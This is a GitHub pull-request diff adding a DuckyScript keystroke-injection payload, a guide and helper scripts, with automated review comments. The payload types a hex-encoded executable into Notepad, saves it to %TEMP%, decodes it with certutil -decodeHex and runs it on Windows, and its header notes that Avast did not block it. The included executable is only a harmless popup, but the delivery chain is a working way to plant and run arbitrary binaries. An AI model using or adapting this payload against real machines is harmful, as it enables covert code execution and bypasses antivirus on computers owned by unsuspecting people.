Merge pull request #347 from aleff-github/patch-64
Install And Run Any Arbitrary Executable - No Internet And Root Needed
dallaswinger authored Jan 8, 2024
2 parents 6cf55d1 + 48ffc96 commit bf2dfb7
Showing 6 changed files with 270 additions and 0 deletions.
@@ -0,0 +1,125 @@
# Install And Run Any Arbitrary Executable - No Internet And Root Needed

Through this guide you will be able to create executable programs that can be installed via DuckyScript in such a way as to avoid using the Internet altogether. This type of installation can lead to serious damage to machines so do it only if you are fully aware and sure of what you are doing, in this example you will already find the code in hexadecimal but if you want to be sure recompile the executable following the following guide.

Executables have been removed for security reasons.

**Category**: Execution

# Guide to Creating an Executable Program using Python

## Introduction

This guide provides detailed instructions on how to use Python to create an executable program, generate hexadecimal code, and automate the execution of the application trough DuckyScript. Practical example in assets directory.

## Creating the Python Program

To begin, create a Python program that performs the desired functionality. You can use any programming language of your choice, but for this guide, we'll be using Python.

```python
import ctypes

ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
```

## Creating the Executable using PyInstaller

Once the Python program is ready, we can use PyInstaller to create an executable file. PyInstaller converts the Python program into a standalone executable that can be run on any compatible system without requiring Python to be installed.

Install PyInstaller using the following command:

```powershell
pip install pyinstaller
```

To create the executable, run the following command in the terminal:

```powershell
pyinstaller --onefile full/path/to/the/file/example.py
```

Replace `example.py` with the filename of your Python script. The `--onefile` flag ensures that the output is a single executable file. Remember that the executable file can be found within the path `dist/example.exe`.

## Generating Hexadecimal Code

Next, we'll generate the hexadecimal code from the executable file. This step is necessary if you intend to automate the execution of the program.

To generate the `hexadecimal` code, you can use various methods or libraries. In this case I decided to create another program in Python capable of doing this conversion, the partial code is as follows but you can find the entire file in the assets folder.

```python
# Rest of the code...
with open(filename, 'rb') as file:
binary_data = file.read()
hex_code = binascii.hexlify(binary_data).decode()
# ...
```

## Creating a DuckyScript to Automate Execution

To create the payload in DuckyScript you simply add the hexadecimal code inside a STRING command immediately after opening the notepad.

```duckyscript
DEFINE #HEX_CODE <hexadecimal_code>
DELAY 500
GUI r
DELAY 500
STRING notepad.exe
ENTER
DELAY 500
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
ALTSTRING "%TEMP%\script.hex"
```

Replace `<hexadecimal_code>` with the actual hexadecimal code generated in the previous step. I used a combo ALT F and STRING S for save the file using `"%TEMP%\script.hex"` that save it in a `TEMP` directory

## Decoding Hexadecimal Code and Executing the Program
Now, we need to decode the hexadecimal code and execute the program. We can use the `certutil` command to accomplish this.

Once saved the file with a hex extension, run the following command in the Command Prompt:

```powershell
certutil -f -decodeHex "%TEMP%\script.hex" "%TEMP%\script.exe"
```

Replace `script.exe` with the desired output filename for the decoded program.

Finally, run the executable on the computer, or any other compatible device, to open start execution of the program.

These are the steps required to create an executable program with Python, generate the hexadecimal code, and automate its execution. Feel free to modify the instructions to suit your specific needs or programming language preferences.

Happy Hacking!

## Credits

<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
</td>
</tr>
</table>
</div>
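Review bot: The introduction says "in this example you will already find the code in hexadecimal", but the very next line says "Executables have been removed for security reasons", so the README promises an asset this commit does not ship. Reword the introduction to say the hex file is a placeholder that the reader regenerates from their own build. Two smaller points in the same file: the `certutil` block is fenced as `powershell` while the text says to run it in the Command Prompt, and `%TEMP%` is Command Prompt syntax; and in the Credits table the link to linkedin.com is captioned "Discord".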
@@ -0,0 +1,77 @@
# Example

Executables have been removed for security reasons.

## File list

- Python code: `example.py`
- Convert to hex script: `convert_to_hex.py`
- Executable file compiled using pyinstaller: `dist/example.exe`
- Hexadecimal code output: `example.hex`
- File compiled from hex code using certutil: `example.exe`

## Procedure

- This Python code create a Windows popup.

```python
import ctypes

ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
```

- Create the executable

```powershell
pyinstaller --onefile C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.py
```

- Create the hex code

```python
import binascii

def convert_to_hex(filename, output_file):
with open(filename, 'rb') as file:
binary_data = file.read()

hex_code = binascii.hexlify(binary_data).decode()

with open(output_file, 'w') as output:
output.write(hex_code)

# Esempio di utilizzo
exe_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'
output_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.hex'
convert_to_hex(exe_filename, output_filename)
```

- Create the DuckyScript payload

```duckyscript
GUI r
DELAY 1000
STRINGLN notepad.exe
DELAY 2000
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
STRINGLN "%TEMP%\example.hex"
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 2000
GUI r
DELAY 500
STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 250
STRINGLN "%TEMP%\pranhex.exe"
```
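Review bot: The last line of the DuckyScript block runs `"%TEMP%\pranhex.exe"`, a name nothing in this procedure creates; the `certutil` line above it writes `"%TEMP%\example.exe"`. Use one filename in both places. The block also types `STRING #HEX_CODE` without the `DEFINE #HEX_CODE` line that the top-level README shows, and the `pyinstaller` and `convert_to_hex` paths are hard-coded under `C:/Users/Aleff/Documents/`; placeholder paths would keep the author's local directory layout out of the documentation.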
@@ -0,0 +1,15 @@
import binascii

def convert_to_hex(filename, output_file):
with open(filename, 'rb') as file:
binary_data = file.read()

hex_code = binascii.hexlify(binary_data).decode()

with open(output_file, 'w') as output:
output.write(hex_code)

# Esempio di utilizzo
exe_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'
output_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.txt'
convert_to_hex(exe_filename, output_filename)
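Review bot: The two path assignments at the bottom are hard-coded to the author's machine, including a `tmp/TODO ` working directory, and the call to `convert_to_hex` runs as soon as the module is imported. Take the input and output paths from the command line and put the call under `if __name__ == "__main__":`. The output name here is `example.txt`, while the file list in the assets README calls the hex output `example.hex`; pick one. The `# Esempio di utilizzo` comment should be in English like the rest of this commit.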
@@ -0,0 +1 @@
here should be present the hex content
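Review bot: This asset holds the sentence "here should be present the hex content" rather than hexadecimal, so it cannot be decoded the way the README procedure describes. Since the README says executables were removed for security reasons, state in the assets file list that this file is a placeholder to be regenerated with `convert_to_hex.py`.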
@@ -0,0 +1,3 @@
import ctypes

ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
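Review bot: The flags `0x10 | 0x1` are MB_ICONERROR and MB_OKCANCEL, so the box titled 'Info' is drawn with an error icon and a Cancel button. If an informational popup is intended, MB_ICONINFORMATION (0x40) with MB_OK (0x0) matches the title. Named constants instead of bare hex values would make the intent readable, and since `ctypes.windll` exists only on Windows, a one-line comment saying so would help.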
@@ -0,0 +1,49 @@
REM ###########################################################################################
REM # |
REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ###########################################################################################


REM Requirements:
REM - Nothing


REM Define here your hexadecimal code
DEFINE #HEX_CODE example


REM Note:
REM - Tested on Windows 11
REM - Running checked but not blocked by Avast antivirus


GUI r
DELAY 1000
STRINGLN notepad.exe
DELAY 2000
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
STRINGLN "%TEMP%\example.hex"
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 2000
GUI r
DELAY 500
STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 250
STRINGLN "%TEMP%\example.exe"
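Review bot: The header declares `Target : Windows 10/11`, but the note further down says only "Tested on Windows 11"; either narrow the target or record a Windows 10 test. The header should also say that `DEFINE #HEX_CODE example` is a placeholder, and list the two files a run leaves in `%TEMP%` (`example.hex` and `example.exe`) so they can be accounted for after a test and defenders reviewing the host know what to look for.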
